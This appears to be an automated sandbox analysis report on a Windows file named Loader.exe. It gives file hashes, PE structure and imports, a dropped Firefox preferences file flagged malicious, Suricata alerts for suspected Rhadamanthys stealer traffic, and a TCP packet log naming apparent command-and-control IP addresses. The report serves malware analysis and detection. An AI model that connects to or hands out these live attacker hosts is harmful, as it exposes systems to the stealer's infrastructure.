                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:L..................F.@.. ......,.....=.,.......q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....CW.V..PROGRA~1..t......O.ICW.V....B...............J.....p+j.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VCW.V....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VCW.V....M.....................G-..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VCW.V..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VCW.V..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):9888
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.518734292216491
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4S0:PeegJUaJHEw9p
                                                                                                                                                                                                                                                                                                              MD5:DED7DB4E3FE9611FC0A6DFF6A7E3ED92
                                                                                                                                                                                                                                                                                                              SHA1:8E4E531B37350C8896A8A3E778D630B3860B3903
                                                                                                                                                                                                                                                                                                              SHA-256:F878E1809B23AD8A8975205CBEC2603CE764CE90FFF2EF96C55C8D15335DACB0
                                                                                                                                                                                                                                                                                                              SHA-512:F979E210EB64DA587BB856C0D560785C233DF5D5D3778AF765DBAD727701E3D8E9C34028B7BE20F3A8D1F4CFC95AAAF4D51C49E9FC025E8812089B88B54689A6
                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                              Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.99935888991876
                                                                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                              File name:Loader.exe
                                                                                                                                                                                                                                                                                                              File size:96'490'794 bytes
                                                                                                                                                                                                                                                                                                              MD5:031bafff0a790efc6955a90dafc6d0e1
                                                                                                                                                                                                                                                                                                              SHA1:266b3e8d18b4440330cc857df33813c4be52545a
                                                                                                                                                                                                                                                                                                              SHA256:ee0d10d2321499903ad1b0105e27ed80cf19c595b8cd5ab2249e146d983c8495
                                                                                                                                                                                                                                                                                                              SHA512:68d7d8f0c09a436adad2edbf03c20fadf492a360cae88450476532758d6ef321b01c17f9b35d9392e1d628c1ee48a2ad24ff6b937a94fe2f41f482711d01b581
                                                                                                                                                                                                                                                                                                              SSDEEP:1572864:B5W6hUQz6aNM02KbWuwxNtv8uXQK9JU+HZNpkSeqS5VexuxnhXtqeGdpgXt9sNSP:i6hUQzHPgxNtv8EJUavkSRmn5tqzAeSP
                                                                                                                                                                                                                                                                                                              TLSH:8828336AD7B11F4DE77ED234CA3A0167572E823BD29344FDA978419329D2A61F37800B
                                                                                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8.....

                                                                                                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                                                                                                              Icon Hash:064646060e36f36d

                                                                                                                                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                              Entrypoint:0x4038af
                                                                                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                              Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                              OS Version Major:5
                                                                                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                                                                                              File Version Major:5
                                                                                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                              Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                                                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                                                                                              sub esp, 000002D4h
                                                                                                                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                                                                                              push 00000020h
                                                                                                                                                                                                                                                                                                              xor ebp, ebp
                                                                                                                                                                                                                                                                                                              pop esi
                                                                                                                                                                                                                                                                                                              mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                                                              mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                                                                              mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                                                              call dword ptr [00409030h]
                                                                                                                                                                                                                                                                                                              push 00008001h
                                                                                                                                                                                                                                                                                                              call dword ptr [004090B4h]
                                                                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                                                                              call dword ptr [004092C0h]
                                                                                                                                                                                                                                                                                                              push 00000008h
                                                                                                                                                                                                                                                                                                              mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                                                                                              call 00007FCD70D04FABh
                                                                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                                                                              push 000002B4h
                                                                                                                                                                                                                                                                                                              mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                                                                                              lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                                                                              push 0040A264h
                                                                                                                                                                                                                                                                                                              call dword ptr [00409184h]
                                                                                                                                                                                                                                                                                                              push 0040A24Ch
                                                                                                                                                                                                                                                                                                              push 00476AA0h
                                                                                                                                                                                                                                                                                                              call 00007FCD70D04C8Dh
                                                                                                                                                                                                                                                                                                              call dword ptr [004090B0h]
                                                                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                                                                              mov edi, 004CF0A0h
                                                                                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                                                                                              call 00007FCD70D04C7Bh
                                                                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                                                                              call dword ptr [00409134h]
                                                                                                                                                                                                                                                                                                              cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                                                                                              mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                                                                                              mov eax, edi
                                                                                                                                                                                                                                                                                                              jne 00007FCD70D0257Ah
                                                                                                                                                                                                                                                                                                              push 00000022h
                                                                                                                                                                                                                                                                                                              pop esi
                                                                                                                                                                                                                                                                                                              mov eax, 004CF0A2h
                                                                                                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                                                                              call 00007FCD70D04951h
                                                                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                                                                              call dword ptr [00409260h]
                                                                                                                                                                                                                                                                                                              mov esi, eax
                                                                                                                                                                                                                                                                                                              mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                                                                              jmp 00007FCD70D02603h
                                                                                                                                                                                                                                                                                                              push 00000020h
                                                                                                                                                                                                                                                                                                              pop ebx
                                                                                                                                                                                                                                                                                                              cmp ax, bx
                                                                                                                                                                                                                                                                                                              jne 00007FCD70D0257Ah
                                                                                                                                                                                                                                                                                                              add esi, 02h
                                                                                                                                                                                                                                                                                                              cmp word ptr [esi], bx

                                                                                                                                                                                                                                                                                                              Rich Headers

                                                                                                                                                                                                                                                                                                              Programming Language:
                                                                                                                                                                                                                                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                              • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                              • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                              • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                              • [LNK] VS2010 SP1 build 40219

                                                                                                                                                                                                                                                                                                              Data Directories

                                                                                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1600000x14198.rsrc
                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                                              Sections

                                                                                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                              .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                              .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                              .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                              .ndata0x7f0000xe10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                              .rsrc0x1600000x141980x142003552ada5c68b4147d7b2340ddc0557deFalse0.8465523097826086data7.35698438612207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                              .reloc0x1750000xfd60x1000d05a26f0a12f7e957e3aee878f20f7c4False0.995849609375data7.803317990396717IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                                              Resources

                                                                                                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                                              RT_ICON0x1603280xb844PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.986962604935131
                                                                                                                                                                                                                                                                                                              RT_ICON0x16bb700x3512PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9730605034594435
                                                                                                                                                                                                                                                                                                              RT_ICON0x16f0880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.4288381742738589
                                                                                                                                                                                                                                                                                                              RT_ICON0x1716300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.49835834896810505
                                                                                                                                                                                                                                                                                                              RT_ICON0x1726d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.6967509025270758
                                                                                                                                                                                                                                                                                                              RT_ICON0x172f800x668Device independent bitmap graphic, 48 x 96 x 4, image size 0EnglishUnited States0.3426829268292683
                                                                                                                                                                                                                                                                                                              RT_ICON0x1735e80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.4314516129032258
                                                                                                                                                                                                                                                                                                              RT_DIALOG0x1738d00x202dataEnglishUnited States0.4085603112840467
                                                                                                                                                                                                                                                                                                              RT_DIALOG0x173ad80xf8dataEnglishUnited States0.6290322580645161
                                                                                                                                                                                                                                                                                                              RT_DIALOG0x173bd00xa0dataEnglishUnited States0.60625
                                                                                                                                                                                                                                                                                                              RT_DIALOG0x173c700xeedataEnglishUnited States0.6260504201680672
                                                                                                                                                                                                                                                                                                              RT_GROUP_ICON0x173d600x68dataEnglishUnited States0.75
                                                                                                                                                                                                                                                                                                              RT_VERSION0x173dc80x1acdata0.5257009345794392
                                                                                                                                                                                                                                                                                                              RT_MANIFEST0x173f780x21fXML 1.0 document, ASCII text, with very long lines (543), with no line terminatorsEnglishUnited States0.578268876611418

                                                                                                                                                                                                                                                                                                              Imports

                                                                                                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                                                                                                              KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                                                                                                                                                                              USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                                                                                                                                                                              GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                                                                                                                                                                              SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                                                                                                                                                                              ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                                                                                                                                                                              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                                                                                                                              ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                                                                                                                                                                              VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                                                                                                                                                                                                                                              Possible Origin

                                                                                                                                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                                              EnglishUnited States

                                                                                                                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                              2024-12-22T23:54:30.170802+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert1104.37.175.2187982192.168.2.549859TCP
                                                                                                                                                                                                                                                                                                              2024-12-22T23:54:57.147487+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert1104.37.175.2187982192.168.2.549929TCP
                                                                                                                                                                                                                                                                                                              2024-12-22T23:54:57.147487+01002854824ETPRO JA3 HASH Suspected Malware Related Response2104.37.175.2187982192.168.2.549929TCP
                                                                                                                                                                                                                                                                                                              2024-12-22T23:55:08.286084+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert1104.37.175.2187982192.168.2.549959TCP
                                                                                                                                                                                                                                                                                                              2024-12-22T23:55:08.286084+01002854824ETPRO JA3 HASH Suspected Malware Related Response2104.37.175.2187982192.168.2.549959TCP

                                                                                                                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:32.153461933 CET4973080192.168.2.577.238.245.43
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:32.273005009 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:32.273099899 CET4973080192.168.2.577.238.245.43
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:32.275815010 CET4973080192.168.2.577.238.245.43
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:32.395375967 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.504648924 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.504663944 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.504674911 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.504723072 CET4973080192.168.2.577.238.245.43
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.504764080 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.504776001 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.504787922 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.504798889 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.504811049 CET4973080192.168.2.577.238.245.43
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.504816055 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.504848003 CET4973080192.168.2.577.238.245.43
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.504863024 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.504863977 CET4973080192.168.2.577.238.245.43
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.504874945 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.504900932 CET4973080192.168.2.577.238.245.43
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.624188900 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.624213934 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.624264002 CET4973080192.168.2.577.238.245.43
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.696515083 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.696619034 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.696671009 CET4973080192.168.2.577.238.245.43
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.700726032 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.700834036 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.700887918 CET4973080192.168.2.577.238.245.43
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.709048033 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.709235907 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.709279060 CET4973080192.168.2.577.238.245.43
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.717442989 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.717572927 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.717624903 CET4973080192.168.2.577.238.245.43
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.725843906 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.725939035 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.725990057 CET4973080192.168.2.577.238.245.43
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.734256983 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.734380007 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.734428883 CET4973080192.168.2.577.238.245.43
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.742614985 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.742712021 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.742855072 CET4973080192.168.2.577.238.245.43
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.750977993 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.751085997 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.751132011 CET4973080192.168.2.577.238.245.43
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.759377956 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.759474039 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.759638071 CET4973080192.168.2.577.238.245.43
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.768121958 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.768238068 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.768279076 CET4973080192.168.2.577.238.245.43
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.776130915 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.776254892 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.776319027 CET4973080192.168.2.577.238.245.43
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.888571024 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.888679981 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.888732910 CET4973080192.168.2.577.238.245.43
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.891042948 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.891136885 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.891189098 CET4973080192.168.2.577.238.245.43
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.896090031 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.896315098 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.896362066 CET4973080192.168.2.577.238.245.43
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.901108027 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.901205063 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.901258945 CET4973080192.168.2.577.238.245.43
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.906162024 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.906291962 CET804973077.238.245.43192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.906910896 CET4973080192.168.2.577.238.245.43
